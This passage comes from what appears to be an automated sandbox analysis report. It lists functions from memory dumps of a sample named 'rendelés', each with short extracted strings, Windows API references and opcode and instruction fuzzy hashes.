Opcode Fuzzy Hash: cb4720be6d58fba49e7ca755a9497992073b52d967cc0df4c878d3ccdad9415b
Instruction Fuzzy Hash: 97314B35E1060A9BCB19DFA4C454A9EB7F6BF89310F108529E816E7390EB70EC87CB50

Function 001192F0 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

\--5, xrefs: 0011937D
\--5, xrefs: 001193BC

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \--5$\--5
API String ID: 0-425160104
Opcode ID: efc2f41084dec388023e6557bc7b634c612c9f718ba62a5da647b80ec013a995
Instruction ID: eea12876cb8d7dbc7b9dcff3204853efb44bf6bf4008ed0a3d527df18a693d92
Opcode Fuzzy Hash: efc2f41084dec388023e6557bc7b634c612c9f718ba62a5da647b80ec013a995
Instruction Fuzzy Hash: D9216030E1020A9BCB09CFA5D4506DEF7B6BF85300F54C62AE825EB390DB709C86CB91

Function 001191E1 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

`,-5, xrefs: 0011929B
`,-5, xrefs: 0011925A

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: `,-5$`,-5
API String ID: 0-2798089182
Opcode ID: 0a1a8464cf0753e7641d4a6ae23a51a91ce33dc5f43c38c2a6bc29b8a0ceae91
Instruction ID: afb35e882a3d0ebbe266c1686aa86202e31108a24b7ff156a34d19a529183d32
Opcode Fuzzy Hash: 0a1a8464cf0753e7641d4a6ae23a51a91ce33dc5f43c38c2a6bc29b8a0ceae91
Instruction Fuzzy Hash: 30219231E042199BCB09CFA5D4645DEB7F2BF89300F21862AE825F7350DBB09C86CB41

Function 001191F0 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

`,-5, xrefs: 0011929B
`,-5, xrefs: 0011925A

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: `,-5$`,-5
API String ID: 0-2798089182
Opcode ID: dfd34db0c04b8fe5b0f8621e8259967ee46522e825ee771d621d62ab30732c4a
Instruction ID: b00c45e643a7e1b3d464dfd29bfeefb5a57d2a9657c9bb9451a854e2fcd37aa4
Opcode Fuzzy Hash: dfd34db0c04b8fe5b0f8621e8259967ee46522e825ee771d621d62ab30732c4a
Instruction Fuzzy Hash: 22215031E042099BDB09CFA5C4545DEF7B2AF89310F11862AE825F7350DBB0AD85CB51

Function 357C6A7B Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C6ACF
$]q, xrefs: 357C6B0A

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 922ed459a4659d363ce5c399245268e18fb57d816c28a08b9a91acba62a5e798
Instruction ID: a59dfc81f67f54981bf9157a6ec515ed1e88e76bb71e331aaf8633a86da00200
Opcode Fuzzy Hash: 922ed459a4659d363ce5c399245268e18fb57d816c28a08b9a91acba62a5e798
Instruction Fuzzy Hash: 1901F4346002899BE728DA65CA91B9B77F7BB48340F1044AAC901AB7C0DB719C52CBA4

Function 35C9D3E4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35C9D502

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 731b5842ac548cfc9181d34411574bb8e9593c26c99e6869c9f726d7138e1dde
Instruction ID: bfa2fd2153f7433d01221c509dc5cb50d4d6e5b25f6a592437a9bd2261c6f76d
Opcode Fuzzy Hash: 731b5842ac548cfc9181d34411574bb8e9593c26c99e6869c9f726d7138e1dde
Instruction Fuzzy Hash: 9851D0B5C00309DFDB14CFA9C984ADEBBB5BF48304F61852AE819BB210D774A945CF91

Function 35C9D3F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35C9D502

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 92b8a3d2199582602fa00b7846a464f4421216ca11f27aab87b1e827bc5bce2b
Instruction ID: c216dae79f447780d4b150fbf26c129a86af223a796caffb46c33976bac30332
Opcode Fuzzy Hash: 92b8a3d2199582602fa00b7846a464f4421216ca11f27aab87b1e827bc5bce2b
Instruction Fuzzy Hash: 9741C0B1D00309DFDB14CF9AC894ADEBBB5FF48314F61852AE819AB210D774A945CF91

Function 35C9A52C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 35C9FBF1

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3a6fa7ed3554e7ca243735fd4f293979962357080a14ddf4edff9ec254eb36bb
Instruction ID: fc511119ba936f2a1f35a42d436197a0c3c32b83f9ace246f0246c787ba7c5b6
Opcode Fuzzy Hash: 3a6fa7ed3554e7ca243735fd4f293979962357080a14ddf4edff9ec254eb36bb
Instruction Fuzzy Hash: B9411DB5910305CFDB15CF99C484A9ABBF5FF88314F24C859D519A7321D7B4A941CFA0

Function 35C93048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35C930D7

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 99e73fe9f6453e9aaa1ef8f98b6e904c80c7a82013c6c12c056bad24fca92dd2
Instruction ID: 46b552023213c5d15eceaa079360178541c13bc88b045862927cb4769e199cbe
Opcode Fuzzy Hash: 99e73fe9f6453e9aaa1ef8f98b6e904c80c7a82013c6c12c056bad24fca92dd2
Instruction Fuzzy Hash: 6321E2B5D002099FDB10CFAAD584AEEBBF5FF48314F10845AE919A7350C378A940CFA1

Function 35C93050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35C930D7

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5ce082337bda1412339f485be63b857f538ee66d6cc72098973723cd9416949
Instruction ID: 7c1c0e1b5b7ce6b1f6b5825fbc96266193167f8014e36f4786a8673475bf3bb4
Opcode Fuzzy Hash: a5ce082337bda1412339f485be63b857f538ee66d6cc72098973723cd9416949
Instruction Fuzzy Hash: 6F21C4B59002499FDB10CFAAD584ADEFBF5FF48314F14841AE918A7350D379A940CFA5

Function 00113E37 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

\Vmm, xrefs: 0011408B

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \Vmm
API String ID: 0-738080011
Opcode ID: 33612bd4b8aef8c40694140e895e5d110cd90571b243ccdfcd82e94e5f5f87ac
Instruction ID: c403c553d78caf6e168fca48324c8284200e5bcb005704609bbc115fe14ea7b6
Opcode Fuzzy Hash: 33612bd4b8aef8c40694140e895e5d110cd90571b243ccdfcd82e94e5f5f87ac
Instruction Fuzzy Hash: 5B917070E0020ADFDF18CFA9C9857EDBBF1AF48714F148139E415A7294EB749986CB92

Function 357CEB40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

PH]q, xrefs: 357CEE0A

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: bfae06534454c3bf4c2c7d2aa6e2760b277689c6910cb8d9f6248f9426c84409
Instruction ID: d36bb6715f7b506c41d9670c189603c988d9e4bac71fc51c3cd3b9b9f041d902
Opcode Fuzzy Hash: bfae06534454c3bf4c2c7d2aa6e2760b277689c6910cb8d9f6248f9426c84409
Instruction Fuzzy Hash: 1871C334B102058FEB0AAB68D550AAEB7A3FF84354F1044B9D806DB395DF35DD46CB91

Function 357CB3E5 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

PH]q, xrefs: 357CB541

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: dd28b21e55eece2c2e2dd1396103f0f698e81fd4278cebcf9a62db8ef3d15956
Instruction ID: f073a0fa10a78998ee2ef453252a0ddcd33f6706a42956a7130c4b48fc58642b
Opcode Fuzzy Hash: dd28b21e55eece2c2e2dd1396103f0f698e81fd4278cebcf9a62db8ef3d15956
Instruction Fuzzy Hash: 9541E230A44305DFEB15DFA5D598A9EBBB2FF85340FA045A9E409EB240DB74E906CB81

Function 357C2968 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

J-5U, xrefs: 357C2974

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: J-5U
API String ID: 0-1548277051
Opcode ID: 1c699899a9a9fb473f506194ff97b2faf7283dd850c9f7b312d2eee0ed901817
Instruction ID: ddc14831b820a4494f294269c0c2f6bbdf2b3c902dcf592104831a7b35659a96
Opcode Fuzzy Hash: 1c699899a9a9fb473f506194ff97b2faf7283dd850c9f7b312d2eee0ed901817
Instruction Fuzzy Hash: 19416175A006058FEB30CEA9D8C0A9FFBF2FB84310F10496AD695DB660D731E9458B91

Function 0011F38D Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0011F4DB

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 146ed310a2f006be38a3b4b709541837d8c95a3ba4a83e28b9f0b91c474f5d17
Instruction ID: 4886b932bda06dff1cf173f8674e14b8ab30d30356c83dac98fbc96becea2058
Opcode Fuzzy Hash: 146ed310a2f006be38a3b4b709541837d8c95a3ba4a83e28b9f0b91c474f5d17
Instruction Fuzzy Hash: EE41E0307002018FDB18AB38C5646AF7BE6AF84350B24467DD40ADB395DF38CC86CB95

Function 357CECF4 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PH]q, xrefs: 357CEE0A

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: ada1980d687fd6f0d25a3ce2b197ecdc4dfae84a4c6633f73fac41d5db3e4cdc
Instruction ID: 0165abc071be7cf4ab8fa5f76b7710f41f547b0b3bd0123f9ca605b38ece0be1
Opcode Fuzzy Hash: ada1980d687fd6f0d25a3ce2b197ecdc4dfae84a4c6633f73fac41d5db3e4cdc
Instruction Fuzzy Hash: 0431DD34B002118FEB09AB74D954A9E7BE3BB89390F1049B8D806DB395DF34DD46CB91

Function 00116F38 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00116F67

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 08489130cff8890f1d8aec621612588e4ad14e3888b22e29bcf2f4a2caa06703
Instruction ID: 5afb194dc83c1c36e98cc3dcf55d1821b4db3621223da22f691251feaa79364e
Opcode Fuzzy Hash: 08489130cff8890f1d8aec621612588e4ad14e3888b22e29bcf2f4a2caa06703
Instruction Fuzzy Hash: DB314170E1021A9BDB18CFA5D8547EEB7B5EF45314F108539E406EB280E7B59886CB41

Function 357CD730 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

|, xrefs: 357CD790

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 94561b912817b39fed20bc802b38b8e6785b816531db8c13ab7237baf5dd2624
Instruction ID: 26ec140b0008707b7dc45145ce02be49cd43df2cd7bc182b80c87985ac2acdc1
Opcode Fuzzy Hash: 94561b912817b39fed20bc802b38b8e6785b816531db8c13ab7237baf5dd2624
Instruction Fuzzy Hash: D721DEB0F00310AFDB44AB789848B9D7BF1AF49350F0144AAE44AEB390DB359902CB81

Function 357CD740 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 357CD790

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 6a7f821e8ad11911f58f0b6a5c59c069e67c757236ffcdcca52a6c0ae6b84508
Instruction ID: 98d5552c0225d7858bc67f547da68a6b98251f465ca8e176f240da2197dbcc2c
Opcode Fuzzy Hash: 6a7f821e8ad11911f58f0b6a5c59c069e67c757236ffcdcca52a6c0ae6b84508
Instruction Fuzzy Hash: 25114C74F103149FDB54EB788808B6D7BF1AB4C710F10446AE50AEB390DB7599018B81

Function 357C1FA9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Obq, xrefs: 357C1FB5

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \Obq
API String ID: 0-2878401908
Opcode ID: 0734d5e00be9799e3598cf9bcd27dd2f4b7b58c1d7e7055f9f07a1dada38aaac
Instruction ID: e99a2c15f0018ff20765e90e1877c8e512fa217a1abc5916c3d0b1f680c55f17
Opcode Fuzzy Hash: 0734d5e00be9799e3598cf9bcd27dd2f4b7b58c1d7e7055f9f07a1dada38aaac
Instruction Fuzzy Hash: E4F0FE71E20219DFDB10DF90E859BAEBBB2FF84700F204119E442A7294CBB41C41DF80

Function 00119770 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc0beeb586737b761805c92a1052b12cafcd40956755ae30608b64db1a858f8
Instruction ID: 12422a3867fa6105a7ab8054992bb45a00e0b35c6550e920d79e9fdbf5d999ef
Opcode Fuzzy Hash: 3cc0beeb586737b761805c92a1052b12cafcd40956755ae30608b64db1a858f8
Instruction Fuzzy Hash: 35A17A70A002098FDB18DFA9E8907AEBBB2FF85310F10857AD919DB285D734D885CB91

Function 00114A4F Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a327118c00ef0aab27ba1cdb41c8c3e493f2a163ed509ed759853885a4fffbec
Instruction ID: b46548bf6e0834fb925d1f0cc4a3c157c390cc473b0c09333112ba9b67cb38b0
Opcode Fuzzy Hash: a327118c00ef0aab27ba1cdb41c8c3e493f2a163ed509ed759853885a4fffbec
Instruction Fuzzy Hash: 26A14D70E04219CFDF18CFA8D9857DDBBF1AF88714F148139D419AB294EB749885CB85

Function 357C13F0 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffda2695ba7b1f51a733e75a4677e58018f56e90ea61f33fb5840e4d5b5269c
Instruction ID: a8df1f2d25846c639255487f10d6c2cde1f1fd8e74e6cc754a93db6ef55cf49c
Opcode Fuzzy Hash: 8ffda2695ba7b1f51a733e75a4677e58018f56e90ea61f33fb5840e4d5b5269c
Instruction Fuzzy Hash: C7818A30B002468BDB04DFA9C954A9EB7F3AB85344F118569D40AEB394EF34DC878B82

Function 357C3730 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb70d41c7e509474fe6a5c35359e68f6bbf3d6486d653837a2e0a33d873ab0a
Instruction ID: fe6a2ca446b49633e317e40f102941df48a3eb8b719370eb317603b423f6492e
Opcode Fuzzy Hash: cdb70d41c7e509474fe6a5c35359e68f6bbf3d6486d653837a2e0a33d873ab0a
Instruction Fuzzy Hash: 3D619DB5F001114FDB14AA6EC880A5EBADBAF94720B254479D80EDB360DFA9DD0287D1

Function 357C1728 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256a9e57b324c6658689e26f5e0ddba8f4ac9d06e801fd1304078ca6ebe7e04f
Instruction ID: 7cd6efa5da7cba62f9c030994a15bd8ed408023c67c797c91445a5c4d32bfaa1
Opcode Fuzzy Hash: 256a9e57b324c6658689e26f5e0ddba8f4ac9d06e801fd1304078ca6ebe7e04f
Instruction Fuzzy Hash: A4911F34E006198BEB14DF64C890BDDB7B2FF89310F2086A9D54DBB255DB70AA85CF91

Function 357CCE78 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4678303465cb1a56502e5da03926a561a2d78ab2005d7507a817512a75760ae5
Instruction ID: 0c9e29ffddc98fb469233265efd5d4aece472261c9ae73826b452ada4e366f87
Opcode Fuzzy Hash: 4678303465cb1a56502e5da03926a561a2d78ab2005d7507a817512a75760ae5
Instruction Fuzzy Hash: 1451D5B47103049FFB14676CD954B5F269FEB8A750F20086AE40ADB3D6CA6CCC478396

Function 357CCE88 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8162276d79656bfaa3fdff83af2872eac8e94d73825cde4091a4b4d79c5f5edb
Instruction ID: eeba84052d7812979110723d563912837d0baaedd2f3ce2c3744d0afd565595e
Opcode Fuzzy Hash: 8162276d79656bfaa3fdff83af2872eac8e94d73825cde4091a4b4d79c5f5edb
Instruction Fuzzy Hash: 5651C3B87103149FFB14676DD954B6F269FEB89750F20082AE40ADB395CA6CCC4783A6

Function 357CA108 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2875bf27a858eac7e2f8e1def19372da68945e95c9ce7d2bcb938af5e60a4cc4
Instruction ID: 92b4e57b53fde8978920c3319a1b9f163a49d6d323b2ddfb323bca21e8aa7cf1
Opcode Fuzzy Hash: 2875bf27a858eac7e2f8e1def19372da68945e95c9ce7d2bcb938af5e60a4cc4
Instruction Fuzzy Hash: 32515B31B103149FCB09EFA8D990A9DB7F2FF88311B508568E806AB355DB75ED46CB90

Function 357C2AE1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2c1f992ce72d82b332879a59e0fe4559c2097ed28ec1bccee90aef74d6234d
Instruction ID: 6c20a99315fc293526282009d68db1d748c8657a4ed13407a338bf170822dd68
Opcode Fuzzy Hash: 4d2c1f992ce72d82b332879a59e0fe4559c2097ed28ec1bccee90aef74d6234d
Instruction Fuzzy Hash: 8551A878A002058FEB25CF68C4C0B6EB7B3FB45350F2088AAD59ADF2A1D734D841CB91

Function 357CE21F Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec48963696726562a17f2cdd84d4ec0553ad6c4a85f5079f66c3dd8358be5927
Instruction ID: 29b08f9bcf8e7aa8a4fa04de33f9e3cc4ef30beecbe0eb9f030d669324049255
Opcode Fuzzy Hash: ec48963696726562a17f2cdd84d4ec0553ad6c4a85f5079f66c3dd8358be5927
Instruction Fuzzy Hash: 98518B35A106058FDB15EF68C584E99BBF6FF48310F1084A9E806EB361DB70EC02CB50

Function 00116C9F Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e3c01d05c58c24dc381425eef41f99103c9b20bc750d86e1ce6044f3503f43
Instruction ID: 81e48271b0d61cd903ff7b1dd68897c0283fbec76c3472dd7742e1ba669d2c5d
Opcode Fuzzy Hash: 16e3c01d05c58c24dc381425eef41f99103c9b20bc750d86e1ce6044f3503f43
Instruction Fuzzy Hash: 50510274E002188FDF18CFA9D885BEDBBB1BF48304F158129E859BB291D775A884CF95

Function 357CE090 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0196a5651c543508b68b6e1776456b4fbd2f360ac761bb2bf4303a361d688f6b
Instruction ID: 0b4e0a75a01e43db3d05aad5e02c64f057f9238009ae8b96711f6019e2f3a546
Opcode Fuzzy Hash: 0196a5651c543508b68b6e1776456b4fbd2f360ac761bb2bf4303a361d688f6b
Instruction Fuzzy Hash: DC412572E143568FCB00CF79C8446AABFF1AF89310F1185AAD818AB251DB78D985CBD1

Function 00116CA8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199e17a8c0ec72fa7d504914a6cde284c7f2e97c260a735a98929e7f27563120
Instruction ID: 15b6061fb45d8ca7101d4c6f331520468a9641baaabba1d083abf4c7feab88bc
Opcode Fuzzy Hash: 199e17a8c0ec72fa7d504914a6cde284c7f2e97c260a735a98929e7f27563120
Instruction Fuzzy Hash: AC511374E002188FDB18CFA9D885BDDBBB1BF48304F158129E819BB391D779A884CB95

Function 357CE230 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4038870334c9c3051f4caefa5cf29699c26542ef5260094f7f6e93b023fa7d3f
Instruction ID: 28337d2999eefeeb49e6dc401105290834eb57a5aa687a348934f5458ab41c56
Opcode Fuzzy Hash: 4038870334c9c3051f4caefa5cf29699c26542ef5260094f7f6e93b023fa7d3f
Instruction Fuzzy Hash: 854127346106058FD715EB69C994E9ABBF6FF88710B1094A9E806EB374DB70EC46CF50

Function 00111838 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27977281b23dd4159b7d348fcb3a7ccbd47c5aa57fcaa8f5999b68d37d2eccd5
Instruction ID: 9372f86e8dc2bef5969ae5039fe954d037149cabf44c449a3ae60e6b9c377fb0
